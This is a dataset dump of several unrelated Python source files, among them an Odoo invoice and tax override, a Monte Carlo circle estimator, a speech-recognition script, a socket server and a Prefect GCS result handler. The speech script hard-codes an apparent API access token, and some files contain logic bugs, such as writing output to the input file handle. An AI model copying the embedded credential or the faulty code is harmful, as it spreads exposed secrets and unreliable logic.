 self.di_spe_saisissable = self.product_id.di_spe_saisissable                  \n            else:\n                if self.product_id:\n                    self.di_un_saisie = self.product_id.di_un_saisie\n                    self.di_type_palette_id = self.product_id.di_type_palette_id\n                    self.product_packaging = self.product_id.di_type_colis_id    \n                    self.di_un_prix = self.product_id.di_un_prix    \n                    self.di_spe_saisissable = self.product_id.di_spe_saisissable                                    \n                \n                \n    @api.multi\n    @api.onchange('di_poib')\n    def _di_recalcule_tare(self):\n        if self.ensure_one():\n            self.di_tare = self.di_poib - self.di_poin            \n                 \n                 \n                 \n    @api.multi    \n    @api.onchange('quantity')\n    def _di_modif_qte_un_mesure(self):\n        if self.ensure_one():\n            if AccountInvoiceLine.modifparprg == False:\n                if self.uom_id:\n                    if self.uom_id.name.lower() == 'kg':\n                        self.di_poin=self.quantity * self.product_id.weight\n                        self.di_poib = self.di_poin + self.di_tare\n                    elif self.uom_id.name.lower() != 'kg':    \n                        if self.product_id.di_get_type_piece().qty != 0.0:\n                            self.di_nb_pieces = ceil(self.quantity/self.product_id.di_get_type_piece().qty)\n                        else:\n                            self.di_nb_pieces = ceil(self.quantity)                                \n                        if self.di_product_packaging_id.qty != 0.0 :\n                            self.di_nb_colis = ceil(self.quantity / self.di_product_packaging_id.qty)\n                        else:      \n                            self.di_nb_colis = ceil(self.quantity)             \n                        if self.di_type_palette_id.di_qte_cond_inf != 0.0:\n                            self.di_nb_palette = self.di_nb_colis / self.di_type_palette_id.di_qte_cond_inf\n                        else:\n                            self.di_nb_palette = self.di_nb_colis\n                        self.di_poin = self.quantity * self.product_id.weight \n                        self.di_poib = self.di_poin + self.di_tare\n                    self.di_flg_modif_uom = True\n            AccountInvoiceLine.modifparprg=False\n            \n            \n    @api.multi            \n    @api.onchange('di_qte_un_saisie', 'di_un_saisie', 'di_type_palette_id', 'di_tare', 'di_product_packaging_id')\n    def _di_recalcule_quantites(self):\n        if self.ensure_one():\n            if self.di_flg_modif_uom == False:\n                if self.di_un_saisie == \"PIECE\":\n                    self.di_nb_pieces = ceil(self.di_qte_un_saisie)\n                    self.quantity = self.product_id.di_get_type_piece().qty * self.di_nb_pieces\n                    if self.di_product_packaging_id.qty != 0.0 :\n                        self.di_nb_colis = ceil(self.quantity / self.di_product_packaging_id.qty)\n                    else:      \n                        self.di_nb_colis = ceil(self.quantity)             \n                    if self.di_type_palette_id.di_qte_cond_inf != 0.0:\n                        self.di_nb_palette = self.di_nb_colis / self.di_type_palette_id.di_qte_cond_inf\n                    else:\n                        self.di_nb_palette = self.di_nb_colis\n                    self.di_poin = self.quantity * 
self.product_id.weight \n                    self.di_poib = self.di_poin + self.di_tare\n                           \n                elif self.di_un_saisie == \"COLIS\":\n                    self.di_nb_colis = ceil(self.di_qte_un_saisie)\n                    self.quantity = self.di_product_packaging_id.qty * self.di_nb_colis\n                    self.di_nb_pieces = ceil(self.di_product_packaging_id.di_qte_cond_inf * self.di_nb_colis)\n                    if self.di_type_palette_id.di_qte_cond_inf != 0.0:                \n                        self.di_nb_palette = self.di_nb_colis / self.di_type_palette_id.di_qte_cond_inf\n                    else:\n                        self.di_nb_palette = self.di_nb_colis\n                    self.di_poin = self.quantity * self.product_id.weight \n                    self.di_poib = self.di_poin + self.di_tare\n                                          \n                elif self.di_un_saisie == \"PALETTE\":            \n                    self.di_nb_palette = self.di_qte_un_saisie\n                    if self.di_type_palette_id.di_qte_cond_inf != 0.0:\n                        self.di_nb_colis = ceil(self.di_nb_palette * self.di_type_palette_id.di_qte_cond_inf)\n                    else:\n                        self.di_nb_colis = ceil(self.di_nb_palette)\n                    self.di_nb_pieces = ceil(self.di_product_packaging_id.di_qte_cond_inf * self.di_nb_colis)\n                    self.quantity = self.di_product_packaging_id.qty * self.di_nb_colis\n                    self.di_poin = self.quantity * self.product_id.weight \n                    self.di_poib = self.di_poin + self.di_tare\n                     \n                elif self.di_un_saisie == \"KG\":\n                    self.di_poin = self.di_qte_un_saisie\n                    self.di_poib = self.di_poin + self.di_tare\n                    self.quantity = self.di_poin\n                    if self.di_product_packaging_id.qty != 0.0:\n                        self.di_nb_colis = ceil(self.quantity / self.di_product_packaging_id.qty)\n                    else:\n                        self.di_nb_colis = ceil(self.quantity)\n                    if self.di_type_palette_id.di_qte_cond_inf != 0.0:    \n                        self.di_nb_palette = self.di_nb_colis / self.di_type_palette_id.di_qte_cond_inf\n                    else:  \n                        self.di_nb_palette = self.di_nb_colis\n                    self.di_nb_pieces = ceil(self.di_product_packaging_id.di_qte_cond_inf * self.di_nb_colis)\n                     \n                else:\n                    self.di_poin = self.di_qte_un_saisie\n                    self.di_poib = self.di_poin + self.di_tare\n                    self.quantity = self.di_poin\n                    if self.di_product_packaging_id.qty != 0.0:\n                        self.di_nb_colis = ceil(self.quantity / self.di_product_packaging_id.qty)\n                    else:\n                        self.di_nb_colis = ceil(self.quantity)\n                    if self.di_type_palette_id.di_qte_cond_inf != 0.0:    \n                        self.di_nb_palette = self.di_nb_colis / self.di_type_palette_id.di_qte_cond_inf\n                    else:  \n                        self.di_nb_palette = self.di_nb_colis\n                    self.di_nb_pieces = ceil(self.di_product_packaging_id.di_qte_cond_inf * self.di_nb_colis)\n                    \n    @api.multi\n    @api.depends('di_qte_un_saisie', 'di_un_saisie', 'di_type_palette_id', 'di_tare', 'di_product_packaging_id')\n   
 def _compute_qte_aff(self):\n        #recalcule des quantités non modifiables pour qu'elles soient enregistrées même si on met en readonly dans les masques.\n        for aol in self:\n            if aol.di_flg_modif_uom == False:        \n                if aol.di_un_saisie == \"PIECE\":\n                    aol.di_nb_pieces = ceil(aol.di_qte_un_saisie)            \n                    if aol.di_product_packaging_id.qty != 0.0 :\n                        aol.di_nb_colis = ceil(aol.quantity / aol.di_product_packaging_id.qty)\n                    else:      \n                        aol.di_nb_colis = ceil(aol.quantity)             \n                    if aol.di_type_palette_id.di_qte_cond_inf != 0.0:\n                        aol.di_nb_palette = aol.di_nb_colis / aol.di_type_palette_id.di_qte_cond_inf\n                    else:\n                        aol.di_nb_palette = aol.di_nb_colis\n                    aol.di_poin = aol.quantity * aol.product_id.weight             \n                            \n                elif aol.di_un_saisie == \"COLIS\":\n                    aol.di_nb_colis = ceil(aol.di_qte_un_saisie)            \n                    aol.di_nb_pieces = ceil(aol.di_product_packaging_id.di_qte_cond_inf * aol.di_nb_colis)\n                    if aol.di_type_palette_id.di_qte_cond_inf != 0.0:                \n                        aol.di_nb_palette = aol.di_nb_colis / aol.di_type_palette_id.di_qte_cond_inf\n                    else:\n                        aol.di_nb_palette = aol.di_nb_colis\n                    aol.di_poin = aol.quantity * aol.product_id.weight             \n                                           \n                elif aol.di_un_saisie == \"PALETTE\":            \n                    aol.di_nb_palette = aol.di_qte_un_saisie\n                    if aol.di_type_palette_id.di_qte_cond_inf != 0.0:\n                        aol.di_nb_colis = ceil(aol.di_nb_palette / aol.di_type_palette_id.di_qte_cond_inf)\n                    else:\n                        aol.di_nb_colis = ceil(aol.di_nb_palette)\n                    aol.di_nb_pieces = ceil(aol.di_product_packaging_id.di_qte_cond_inf * aol.di_nb_colis)            \n                    aol.di_poin = aol.quantity * aol.product_id.weight             \n                      \n                elif aol.di_un_saisie == \"KG\":\n                    aol.di_poin = aol.di_qte_un_saisie                        \n                    if aol.di_product_packaging_id.qty != 0.0:\n                        aol.di_nb_colis = ceil(aol.quantity / aol.di_product_packaging_id.qty)\n                    else:\n                        aol.di_nb_colis = ceil(aol.quantity)\n                    if aol.di_type_palette_id.di_qte_cond_inf != 0.0:    \n                        aol.di_nb_palette = aol.di_nb_colis / aol.di_type_palette_id.di_qte_cond_inf\n                    else:  \n                        aol.di_nb_palette = aol.di_nb_colis\n                    aol.di_nb_pieces = ceil(aol.di_product_packaging_id.di_qte_cond_inf * aol.di_nb_colis)\n                      \n                else:\n                    aol.di_poin = aol.di_qte_un_saisie            \n                    aol.quantity = aol.di_poin\n                    if aol.di_product_packaging_id.qty != 0.0:\n                        aol.di_nb_colis = ceil(aol.quantity / aol.di_product_packaging_id.qty)\n                    else:\n                        aol.di_nb_colis = ceil(aol.quantity)\n                    if aol.di_type_palette_id.di_qte_cond_inf != 0.0:    \n                      
  aol.di_nb_palette = aol.di_nb_colis / aol.di_type_palette_id.di_qte_cond_inf\n                    else:  \n                        aol.di_nb_palette = aol.di_nb_colis\n                    aol.di_nb_pieces = ceil(aol.di_product_packaging_id.di_qte_cond_inf * aol.di_nb_colis) \n            else:           \n                if aol.product_id.di_get_type_piece().qty != 0.0:\n                    aol.di_nb_pieces = ceil(aol.quantity/aol.product_id.di_get_type_piece().qty)\n                else:\n                    aol.di_nb_pieces = ceil(aol.quantity)                                \n                if aol.di_product_packaging_id.qty != 0.0 :\n                    aol.di_nb_colis = ceil(aol.quantity / aol.di_product_packaging_id.qty)\n                else:      \n                    aol.di_nb_colis = ceil(aol.quantity)             \n                if aol.di_type_palette_id.di_qte_cond_inf != 0.0:\n                    aol.di_nb_palette = aol.di_nb_colis / aol.di_type_palette_id.di_qte_cond_inf\n                else:\n                    aol.di_nb_palette = aol.di_nb_colis\n                aol.di_poin = aol.quantity * aol.product_id.weight \n                aol.di_poib = aol.di_poin + aol.di_tare\n               \n    @api.model\n    def create(self, vals):               \n        di_avec_sale_line_ids = False  # initialisation d'une variable       \n        di_ctx = dict(self._context or {})  # chargement du contexte\n        for key in vals.items():  # vals est un dictionnaire qui contient les champs modifiés, on va lire les différents enregistrements                      \n            if key[0] == \"sale_line_ids\":  # si on a modifié sale_line_id\n                di_avec_sale_line_ids = True\n        if di_avec_sale_line_ids == True:\n            qte_a_fac = 0.0\n            poib = 0.0\n            for id_ligne in vals[\"sale_line_ids\"][0][2]:\n                Disaleorderline = self.env['sale.order.line'].search([('id', '=', id_ligne)], limit=1)                                 \n                if Disaleorderline.id != False:               \n                    #on attribue par défaut les valeurs de la ligne de commande   \n                    vals[\"di_tare\"] = Disaleorderline.di_tare  \n                    vals[\"di_un_saisie\"] = Disaleorderline.di_un_saisie\n                    vals[\"di_type_palette_id\"] = Disaleorderline.di_type_palette_id.id\n                    vals[\"di_product_packaging_id\"] = Disaleorderline.product_packaging.id \n                    vals[\"di_un_prix\"] = Disaleorderline.di_un_prix\n                    vals[\"di_flg_modif_uom\"]=Disaleorderline.di_flg_modif_uom\n                    qte_a_fac += Disaleorderline.di_qte_a_facturer_un_saisie   \n                    poib += Disaleorderline.di_poib\n                     \n            vals[\"di_qte_un_saisie\"] = qte_a_fac\n            vals[\"di_poib\"] = poib            \n            \n        di_avec_purchase_line_ids = False  # initialisation d'une variable       \n        di_ctx = dict(self._context or {})  # chargement du contexte\n        for key in vals.items():  # vals est un dictionnaire qui contient les champs modifiés, on va lire les différents enregistrements                      \n            if key[0] == \"purchase_line_ids\":  # si on a modifié sale_line_id\n                di_avec_purchase_line_ids = True\n        if di_avec_purchase_line_ids == True:\n            qte_a_fac = 0.0\n            poib = 0.0\n            for id_ligne in vals[\"purchase_line_ids\"][0][2]:\n                
Dipurchaseorderline = self.env['purchase.order.line'].search([('id', '=', id_ligne)], limit=1)                                 \n                if Dipurchaseorderline.id != False:               \n                    #on attribue par défaut les valeurs de la ligne de commande   \n                    vals[\"di_tare\"] = Dipurchaseorderline.di_tare  \n                    vals[\"di_un_saisie\"] = Dipurchaseorderline.di_un_saisie\n                    vals[\"di_type_palette_id\"] = Dipurchaseorderline.di_type_palette_id.id\n                    vals[\"di_product_packaging_id\"] = Dipurchaseorderline.product_packaging.id \n                    vals[\"di_un_prix\"] = Dipurchaseorderline.di_un_prix\n                    qte_a_fac += Dipurchaseorderline.di_qte_un_saisie   \n                    poib += Dipurchaseorderline.di_poib\n                     \n            vals[\"di_qte_un_saisie\"] = qte_a_fac\n            vals[\"di_poib\"] = poib\n  \n        res = super(AccountInvoiceLine, self).create(vals)                           \n        return res\n\n\n\nclass AccountTax(models.Model):\n    _inherit = 'account.tax'\n        \n    di_taxe_id = fields.Many2one('account.tax', string='Taxe sur la taxe',help=\"\"\"Permet par exemple d'affecter de la TVA sur l'interfel \"\"\")\n    \n    @api.multi\n    def compute_all(self, price_unit, currency=None, quantity=1.0, product=None, partner=None):\n        # copie standard\n        \"\"\" Returns all information required to apply taxes (in self + their children in case of a tax goup).\n            We consider the sequence of the parent for group of taxes.\n                Eg. considering letters as taxes and alphabetic order as sequence :\n                [G, B([A, D, F]), E, C] will be computed as [A, D, F, C, E, G]\n\n        RETURN: {\n            'total_excluded': 0.0,    # Total without taxes\n            'total_included': 0.0,    # Total with taxes\n            'taxes': [{               # One dict for each tax in self and their children\n                'id': int,\n                'name': str,\n                'amount': float,\n                'sequence': int,\n                'account_id': int,\n                'refund_account_id': int,\n                'analytic': boolean,\n            }]\n        } \"\"\"\n        if len(self) == 0:\n            company_id = self.env.user.company_id\n        else:\n            company_id = self[0].company_id\n        if not currency:\n            currency = company_id.currency_id\n        taxes = []\n        # By default, for each tax, tax amount will first be computed\n        # and rounded at the 'Account' decimal precision for each\n        # PO/SO/invoice line and then these rounded amounts will be\n        # summed, leading to the total amount for that tax. But, if the\n        # company has tax_calculation_rounding_method = round_globally,\n        # we still follow the same method, but we use a much larger\n        # precision when we round the tax amount for each line (we use\n        # the 'Account' decimal precision + 5), and that way it's like\n        # rounding after the sum of the tax amounts of each line\n        prec = currency.decimal_places\n\n        # In some cases, it is necessary to force/prevent the rounding of the tax and the total\n        # amounts. 
For example, in SO/PO line, we don't want to round the price unit at the\n        # precision of the currency.\n        # The context key 'round' allows to force the standard behavior.\n        round_tax = False if company_id.tax_calculation_rounding_method == 'round_globally' else True\n        round_total = True\n        if 'round' in self.env.context:\n            round_tax = bool(self.env.context['round'])\n            round_total = bool(self.env.context['round'])\n\n        if not round_tax:\n            prec += 5\n\n        base_values = self.env.context.get('base_values')\n        if not base_values:\n            total_excluded = total_included = base = round(price_unit * quantity, prec)\n        else:\n            total_excluded, total_included, base = base_values\n\n        # Sorting key is mandatory in this case. When no key is provided, sorted() will perform a\n        # search. However, the search method is overridden in account.tax in order to add a domain\n        # depending on the context. This domain might filter out some taxes from self, e.g. in the\n        # case of group taxes.\n        \n        for tax in self.sorted(key=lambda r: r.sequence):\n            price_include = self._context.get('force_price_include', tax.price_include)\n            if tax.amount_type == 'group':\n                children = tax.children_tax_ids.with_context(base_values=(total_excluded, total_included, base))\n                ret = children.compute_all(price_unit, currency, quantity, product, partner)\n                total_excluded = ret['total_excluded']\n                base = ret['base'] if tax.include_base_amount else base\n                total_included = ret['total_included']\n                tax_amount = total_included - total_excluded\n                taxes += ret['taxes']\n                continue\n\n            tax_amount = tax._compute_amount(base, price_unit, quantity, product, partner)\n            if not round_tax:\n                tax_amount = round(tax_amount, prec)\n            else:\n                tax_amount = currency.round(tax_amount)\n\n            if price_include:\n                total_excluded -= tax_amount\n                base -= tax_amount\n            else:\n                total_included += tax_amount\n\n            # Keep base amount used for the current tax\n            tax_base = base\n\n            if tax.include_base_amount:\n                base += tax_amount\n\n            taxes.append({\n                'id': tax.id,\n                'name': tax.with_context(**{'lang': partner.lang} if partner else {}).name,\n                'amount': tax_amount,\n                'base': tax_base,\n                'sequence': tax.sequence,\n                'account_id': tax.account_id.id,\n                'refund_account_id': tax.refund_account_id.id,\n                'analytic': tax.analytic,\n                'price_include': tax.price_include, \n                'tax_exigibility': tax.tax_exigibility,               \n            })\n             \n            # spé pour affecter une taxe sur une autre taxe\n            if tax.di_taxe_id:\n                di_tax_amount = tax.di_taxe_id._compute_amount(tax_amount, tax_amount, 1.0, product, partner)\n                if not round_tax:\n                    di_tax_amount = round(di_tax_amount, prec)\n                else:\n                    di_tax_amount = currency.round(di_tax_amount)                \n                taxes.append({\n                    'id': tax.di_taxe_id.id,\n                    'name': 
tax.di_taxe_id.with_context(**{'lang': partner.lang} if partner else {}).name,\n                    'amount': di_tax_amount,\n                    'base': tax_amount,\n                    'sequence': tax.di_taxe_id.sequence,\n                    'account_id': tax.di_taxe_id.account_id.id,\n                    'refund_account_id': tax.di_taxe_id.refund_account_id.id,\n                    'analytic': tax.di_taxe_id.analytic,\n                    'price_include': tax.di_taxe_id.price_include, \n                    'tax_exigibility': tax.di_taxe_id.tax_exigibility,                   \n                })\n                \n                #fin spé\n                \n\n        return {\n            'taxes': sorted(taxes, key=lambda k: k['sequence']),\n            'total_excluded': currency.round(total_excluded) if round_total else total_excluded,\n            'total_included': currency.round(total_included) if round_total else total_included,\n            'base': base,\n        }","sub_path":"addons_gesprim/difodoo_ventes/models/di_inherited_account_invoice.py","file_name":"di_inherited_account_invoice.py","file_ext":"py","file_size_in_byte":35398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
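The invoice and invoice-line methods in the record above repeat the same five-branch if/elif ladder to map di_un_prix onto the quantity used for price and tax computation. A minimal sketch of how that dispatch could be factored into one helper (the function name di_get_qte_prix and the namedtuple stand-in are mine; the field names come from the record):

    from collections import namedtuple

    # stand-in for an invoice line; field names follow the record
    Line = namedtuple('Line', 'di_un_prix di_nb_pieces di_nb_colis di_nb_palette di_poin quantity')

    def di_get_qte_prix(line):
        # map the pricing unit to the matching quantity field;
        # anything else (False, '') falls back to line.quantity
        mapping = {
            "PIECE": line.di_nb_pieces,
            "COLIS": line.di_nb_colis,
            "PALETTE": line.di_nb_palette,
            "KG": line.di_poin,
        }
        return mapping.get(line.di_un_prix, line.quantity)

    assert di_get_qte_prix(Line("KG", 4, 2, 1.0, 12.5, 3.0)) == 12.5
    assert di_get_qte_prix(Line(False, 4, 2, 1.0, 12.5, 3.0)) == 3.0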
+{"seq_id":"213141907","text":"\"\"\"\nconstruct dictionary\n\"\"\"\nfrom nltk import word_tokenize\nfrom collections import Counter\nimport pickle\n\n\ndef readWikiVocab(fn=\"vocab.txt\"):\n    with open(fn, 'r') as input_file:\n        cnt = Counter()\n        for line in input_file:\n            word, freq = line.strip().split()\n            cnt[word] += int(freq)\n    return cnt\n\n\ndef pythonTokenizeText(fn, output_fn):\n    with open(fn, 'r') as input_file:\n        tok_lines = []\n        for line in input_file:\n            tok_seq = word_tokenize(line.strip().lower().decode('utf8'))\n            tok_line = ' '.join(tok_seq)\n            tok_lines.append(tok_line)\n\n    with open(output_fn, 'w') as output_file:\n        tok_text = '\\n'.join(tok_lines)\n        print(tok_text.encode(\"utf8\"), file=output_file)\n    print('done processing train text...')\n\n\ndef dumpDict(fn='tok_train.txt'):\n    \"\"\"\n    dict: words in lower case\n    \"\"\"\n    # word from wikipedia\n    cnt = readWikiVocab()\n\n    # word from perspective data\n    with open(fn, 'r') as input_file:\n        text = input_file.read()\n        text_seq = text.split()\n        for word in text_seq:\n            cnt[word] += 1\n\n    # dump dictionary\n    with open('dict.pickle', 'wb') as handle:\n        pickle.dump(cnt, handle)\n    print('done dumping the vocabulary...')\n\n\ndef loadDict(fn='vocab.txt', freq_threshold=6):\n    with open(fn, 'r') as handle:\n        cnt = dict(list(map(lambda x: (x.split()[0], int(x.split()[1])), handle.readlines())))\n        rare_words = [word for word in cnt if cnt[word] < freq_threshold]\n    for word in rare_words:\n        cnt.pop(word)\n    print('done loading dictionary...')\n    return cnt\n\n\ndef sanityCheck(cnt_dump='dict.pickle', test_fn='tok_test.txt'):\n    cnt = loadDict(cnt_dump)\n\n    with open(test_fn, 'r') as input_file:\n        text = input_file.read()\n        text_seq = text.split()\n\n    with open('missing_words.txt', 'w') as output_file:\n        for word in text_seq:\n            if word not in cnt:\n                print(word, file=input_file)\n    print('done sanity check...')\n","sub_path":"context_based_selection/corpus_util.py","file_name":"corpus_util.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"126378868","text":"# Create your views here.\nfrom django.shortcuts import render\n\nfrom merch.models import Merch\n\n\ndef product_detail(request, merch_slug):\n    merch = Merch.objects.get(slug=merch_slug)\n    context = {\n        'merch': merch,\n    }\n    return render(request, 'merch/merch_detail.html', context)\n","sub_path":"merch/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"330003477","text":"def run_formula(dv, param = None):\n    defult_param = {'t1':1,'t2':1,'t3':5}\n    if not param:\n        param = defult_param\n        \n\n\n    alpha1 = dv.add_formula('alpha1', \n                         \"-If(net_profit>Delay(net_profit,%s),Delay(turnover_ratio,%s),Ts_Max(turnover_ratio,%s))\"%(param['t1'],param['t2'],param['t3'])\n                        , is_quarterly=False, add_data=True)\n\n\n    return alpha1\n","sub_path":"factor2/alpha1.py","file_name":"alpha1.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"610724674","text":"from math import pi, fabs\nfrom random import random\n\nclass Circle:\n\n    POINTS = 10\n\n    def __init__(self, radius):\n        self.radius = radius\n        self.area = radius*radius * pi\n\n    def monte_carlo(self, iteration):\n        num_area = 0\n\n        for _ in range(Circle.POINTS**iteration):\n            if (self.radius*random())**2 + (self.radius*random())**2 < self.radius**2:\n                num_area += self.radius**2\n\n        # divide by Circle.POINTS to get the probability and multiply by 4 because we only integrate one quadrant\n        num_area = num_area/(Circle.POINTS**iteration)*4\n        error = fabs(self.area-num_area)/num_area\n\n        print(\"Points: 10^\" + str(iteration) + \" \" + str(self.area) + \" - \" + str(num_area) + \" - Error: \" + str(error*100))\n\n\nif __name__==  \"__main__\":\n    circle = Circle(4)\n\n    iteration = 1\n    while True:\n        circle.monte_carlo(iteration)\n        iteration += 1\n\n","sub_path":"circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"52381090","text":"from ScopeFoundry import LQCollection, BaseApp\n\nclass LQConnectionTestApp(BaseApp):\n    \n    name = 'LQConnectionTestApp'\n\n    def __init__(self,argv):\n        BaseApp.__init__(self,argv)\n        \n        lq1 = self.settings.New('lq1', dtype=float,ro=False, initial=5)\n        lq2 = self.settings.New('lq2', dtype=float,ro=False, initial=35)\n\n        lq1.connect_to_lq(lq2)\n        \n        self.ui = self.settings.New_UI()\n        \n        self.ui.show()\n        self.console_widget.show()\n        \n        \nif __name__ == '__main__':\n    app = LQConnectionTestApp([])\n    app.exec_()","sub_path":"tests/lq_connection_test.py","file_name":"lq_connection_test.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"70635462","text":"#!/usr/bin/env python\n\nimport speech_recognition as sr\nfrom termcolor import colored as color\nimport apiai\nimport json\nfrom os import system\nimport wikipedia as wiki\nfrom time import sleep\nimport webbrowser as wb\n\n\nBOLD = \"\\033[1m\"   #use to bold the text\nEND = \"\\033[0m\"    #use to close the bold text\nCLIENT_ACCESS_TOKEN = \"2245d4ab7c99466e806c8986a18234c4\"\nai = apiai.ApiAI(CLIENT_ACCESS_TOKEN)\n\ngoogle_search = \"https://www.google.com/search?q=\"\nyoutube_search = \"https://www.youtube.com/results?search_query=\"\ngoogle_drive = \"https://drive.google.com\"\ngmail = \"https://mail.google.com\"\ntry:\n    r = sr.Recognizer()\n    with sr.Microphone() as source:\n        system(\"clear\")\n        print(color(BOLD+\"Hola!\\nAsk me anything.\"+END,\"green\"))\n        while True:\n            audio = r.listen(source)\n\n#       while True:     \n            try:\n                query = r.recognize_google(audio)\n                print(query)\n            except sr.UnknownValueError:\n                print (color(\"Listening\",\"blue\"))\n\n\n   \n\nexcept KeyboardInterrupt:\n    print (color(BOLD+\" Bye!\"+END, \"cyan\"))\n","sub_path":"stt.py","file_name":"stt.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"531250395","text":"# coding = utf-8\nimport socket\n\ns = socket.socket()  # 创建 socket 对象\nhost = socket.gethostname()  # 获取本地主机名\nport = 12345  # 设置端口\ns.bind((host, port))  # 绑定端口\ns.listen(5)  # 等待客户端连接\nwhile True:\n\tc, addr = s.accept()  # 建立客户端连接。\n\tprint('连接地址:', addr)\n\tc.send(bytes(\"连接成功\", \"utf-8\"))\n\tc.close()  # 关闭连接\n","sub_path":"day01_01/服务端.py","file_name":"服务端.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"527175420","text":"import base64\nimport uuid\nfrom typing import TYPE_CHECKING, Any\n\nimport cloudpickle\nimport pendulum\n\nfrom prefect.client import Secret\nfrom prefect.engine.result_handlers import ResultHandler\n\nif TYPE_CHECKING:\n    import google.cloud\n\n\nclass GCSResultHandler(ResultHandler):\n    \"\"\"\n    Result Handler for writing to and reading from a Google Cloud Bucket.\n\n    To authenticate with Google Cloud, you need to ensure that your flow's runtime environment\n    has the proper credentials available (see\n    https://cloud.google.com/docs/authentication/production for all the authentication\n    options).\n\n    You can also optionally provide the name of a Prefect Secret containing your\n    service account key.\n\n    Args:\n        - bucket (str): the name of the bucket to write to / read from\n        - credentials_secret (str, optional): the name of the Prefect Secret\n            which stores a JSON representation of your Google Cloud credentials.\n    \"\"\"\n\n    def __init__(self, bucket: str = None, credentials_secret: str = None) -> None:\n        self.bucket = bucket\n        self.credentials_secret = credentials_secret\n        super().__init__()\n\n    def initialize_client(self) -> None:\n        \"\"\"\n        Initializes GCS connections.\n        \"\"\"\n        from prefect.utilities.gcp import get_storage_client\n\n        if self.credentials_secret:\n            credentials = Secret(self.credentials_secret).get()\n        else:\n            credentials = None\n        client = get_storage_client(credentials=credentials)\n        self.gcs_bucket = client.bucket(self.bucket)\n\n    @property\n    def gcs_bucket(self) -> \"google.cloud.storage.bucket.Bucket\":\n        if not hasattr(self, \"_gcs_bucket\"):\n            self.initialize_client()\n        return self._gcs_bucket\n\n    @gcs_bucket.setter\n    def gcs_bucket(self, val: Any) -> None:\n        self._gcs_bucket = val\n\n    def __getstate__(self) -> dict:\n        state = self.__dict__.copy()\n        if \"_gcs_bucket\" in state:\n            del state[\"_gcs_bucket\"]\n        return state\n\n    def __setstate__(self, state: dict) -> None:\n        self.__dict__.update(state)\n\n    def write(self, result: Any) -> str:\n        \"\"\"\n        Given a result, writes the result to a location in GCS\n        and returns the resulting URI.\n\n        Args:\n            - result (Any): the written result\n\n        Returns:\n            - str: the GCS URI\n        \"\"\"\n        date = pendulum.now(\"utc\").format(\"Y/M/D\")  # type: ignore\n        uri = \"{date}/{uuid}.prefect_result\".format(date=date, uuid=uuid.uuid4())\n        self.logger.debug(\"Starting to upload result to {}...\".format(uri))\n        binary_data = base64.b64encode(cloudpickle.dumps(result)).decode()\n        self.gcs_bucket.blob(uri).upload_from_string(binary_data)\n        self.logger.debug(\"Finished uploading result to {}.\".format(uri))\n        return uri\n\n    def read(self, uri: str) -> Any:\n        \"\"\"\n        Given a uri, reads a result from GCS, reads it and returns it\n\n        Args:\n            - uri (str): the GCS URI\n\n        Returns:\n            - Any: the read result\n        \"\"\"\n        try:\n            self.logger.debug(\"Starting to download result from {}...\".format(uri))\n            result = self.gcs_bucket.blob(uri).download_as_string()\n            try:\n                return_val = cloudpickle.loads(base64.b64decode(result))\n            except 
EOFError:\n                return_val = None\n            self.logger.debug(\"Finished downloading result from {}.\".format(uri))\n        except Exception as exc:\n            self.logger.exception(\n                \"Unexpected error while reading from result handler: {}\".format(\n                    repr(exc)\n                )\n            )\n            return_val = None\n        return return_val\n","sub_path":"src/prefect/engine/result_handlers/gcs_result_handler.py","file_name":"gcs_result_handler.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
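At its core, the handler's write/read pair is a cloudpickle-to-base64 round trip wrapped around the GCS blob calls; the serialization step can be checked locally, without any cloud credentials:

    import base64

    import cloudpickle

    result = {"answer": 42}
    encoded = base64.b64encode(cloudpickle.dumps(result)).decode()  # what write() uploads
    decoded = cloudpickle.loads(base64.b64decode(encoded))          # what read() recovers
    assert decoded == result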
+{"seq_id":"345908351","text":"import pandas as pd\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\ndef clean_opcodes(filename):\n\n\tdf = pd.read_csv(filename)\n\tcleaned_df = df.dropna()\n\topcodes = cleaned_df.set_index('Opcode').T.to_dict('list')\n\n\t# import ipdb\n\t# ipdb.set_trace()\n\n\treturn opcodes","sub_path":"loops_s3/util/clean_opcodes.py","file_name":"clean_opcodes.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"193369995","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom mpl_toolkits.mplot3d import Axes3D\nmatplotlib.use('TkAgg')\n\nclass GP:\n    def __init__(self,kernelPar,varMeas):\n        self.kernelPar = kernelPar\n        self.varMeas = varMeas\n        self.emptyData = True\n\n    def kernel(self,z1,z2):\n        squaredDistance = np.linalg.norm(z1-z2,2)\n        return np.exp(-.5 * 1/self.kernelPar * squaredDistance)\n\n    def getKernelMatrix(self,vec1,vec2):\n        n = vec1.shape[0]\n        N = vec2.shape[0]\n        K = np.zeros((n,N))\n        for i in range(n):\n            for j in range(N):\n                 K[i,j] = self.kernel(vec1[i,:],vec2[j,:])\n        return K\n        # todo: only update K matrix instead of recalculating\n\n    def update(self,inputData,outputData):\n        if self.emptyData:\n            self.trainInput = inputData\n            self.trainOutput = outputData\n            self.emptyData = False\n        else:\n            self.trainInput = np.vstack((self.trainInput,inputData))\n            self.trainOutput = np.vstack((self.trainOutput,outputData))\n\n    def predict(self,input):\n        # mu = 